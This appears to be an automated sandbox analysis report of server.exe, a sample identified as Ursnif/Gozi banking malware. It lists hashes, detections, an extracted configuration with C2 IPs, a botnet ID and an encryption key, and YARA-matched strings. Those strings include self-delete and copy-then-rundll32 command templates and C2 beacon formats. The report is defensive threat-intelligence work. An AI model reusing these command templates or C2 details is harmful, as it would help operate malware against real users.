Windows Analysis Report
server.exe

Overview

General Information

Sample Name: server.exe
Analysis ID: 834121
MD5: 62c6ed30422b5876110ee6ab6660223e
SHA1: 60e1a1c26d35c9d90fb163364e3a4deec1d4016a
SHA256: fbb595a285f1126d4bfe09240e40b1a8a66ac5024f90b5e64860bb872e05a248
Tags: agenziaentrate, exe, gozi, isfb, mef, mise, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Contains functionality to query locales information (e.g. system language)
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
  • System is w10x64
  • server.exe (PID: 5276 cmdline: C:\Users\user\Desktop\server.exe MD5: 62C6ED30422B5876110EE6AB6660223E)
  • cleanup
Name: Gozi, Ursnif
Description:
  • 2000 Ursnif aka Snifula
  • 2006 Gozi v1.0, Gozi CRM, CRM, Papras
  • 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia (*)
  • (*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest
In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and is often classified as Ursnif aka Snifula. In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{
  "RSA Public Key": "R0Bht5yr3xsiZRHpi1IcuQzz6YItuljDFrXOyTKoaQlwPAAozpclh3dtqYAoNTIiCOiLcKQId5qu05Sa2skMJuIISUXqEWSZ+IAZkoJ0OBq41i9MAk5jYXBlhytm5kbe+FMWRShoa8oCYchGlG9NgOodr8XQtZdDCJW9xmKfhwDRkZoE+G2m4TOwcjqzcerFacks/3HGeYJ/jMn7p8mdhgGNbMkoKIT/xFVRX5VcOCuobljxHriqIaIaQdUGlw8xtl5qDXpJ1csBauHGSZ6RQY7ls8Ja+v/1aH+JgeCIQ3FiKBeHVCv6UuNvcyy6vYLMPGQwddKCKyqcgzolzbWcSfALrntnMTN8HRf9wsUd/no=",
  "c2_domain": [
    "checklist.skype.com",
    "193.233.175.115",
    "185.68.93.20",
    "62.173.140.250",
    "46.8.210.133"
  ],
  "botnet": "7716",
  "server": "50",
  "serpent_key": "XmIRUTaZ9Sm6Rr81",
  "sleep_time": "45",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
Yara matches (memory dumps): Source | Rule | Description | Author | Strings

Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_261f5ac5 | Description: unknown | Author: unknown
  • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1ca8:$a9: Software\AppDataLow\Software\Microsoft\
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Ursnif | Description: Yara detected Ursnif | Author: Joe Security
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_Gozi_fd494041 | Description: unknown | Author: unknown
  • 0x1228:$a1: /C ping localhost -n %u && del "%s"
  • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xa9c:$a5: filename="%.4u.%lu"
  • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe6d:$a9: &whoami=%s
  • 0xe56:$a10: %u.%u_%u_%u_x%u
  • 0xd63:$a11: size=%u&hash=0x%08x
  • 0xb1d:$a12: &uptime=%u
  • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
  • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP

Yara matches (unpacked PEs): Source | Rule | Description | Author | Strings

Source: 0.2.server.exe.4e394a0.3.raw.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security
Source: 0.2.server.exe.47e0000.2.unpack | Rule: JoeSecurity_Ursnif_1 | Description: Yara detected Ursnif | Author: Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: server.exe | ReversingLabs: Detection: 37%
Source: server.exe | Virustotal: Detection: 40%
Source: server.exe | Joe Sandbox ML: detected
Source: 0.2.server.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen7
Source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "R0Bht5yr3xsiZRHpi1IcuQzz6YItuljDFrXOyTKoaQlwPAAozpclh3dtqYAoNTIiCOiLcKQId5qu05Sa2skMJuIISUXqEWSZ+IAZkoJ0OBq41i9MAk5jYXBlhytm5kbe+FMWRShoa8oCYchGlG9NgOodr8XQtZdDCJW9xmKfhwDRkZoE+G2m4TOwcjqzcerFacks/3HGeYJ/jMn7p8mdhgGNbMkoKIT/xFVRX5VcOCuobljxHriqIaIaQdUGlw8xtl5qDXpJ1csBauHGSZ6RQY7ls8Ja+v/1aH+JgeCIQ3FiKBeHVCv6UuNvcyy6vYLMPGQwddKCKyqcgzolzbWcSfALrntnMTN8HRf9wsUd/no=", "c2_domain": ["checklist.skype.com", "193.233.175.115", "185.68.93.20", "62.173.140.250", "46.8.210.133"], "botnet": "7716", "server": "50", "serpent_key": "XmIRUTaZ9Sm6Rr81", "sleep_time": "45", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_047E1508

Compliance

Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | DNS traffic detected: query: checklist.skype.com reply code: Name error (3)
Source: unknown | DNS traffic detected: queries for: checklist.skype.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match | File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Source: Yara match | File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
Source: Yara match | File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_047E1508

System Summary

Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\server.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: server.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.524385059.0000000002BA6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.524298163.0000000002B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: server.exe, 00000000.00000000.257940340.0000000002B56000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamegunshot.exe6 vs server.exe
Source: server.exe | Binary or memory string: OriginalFilenamegunshot.exe6 vs server.exe
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E16DF 0_2_047E16DF
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E832C 0_2_047E832C
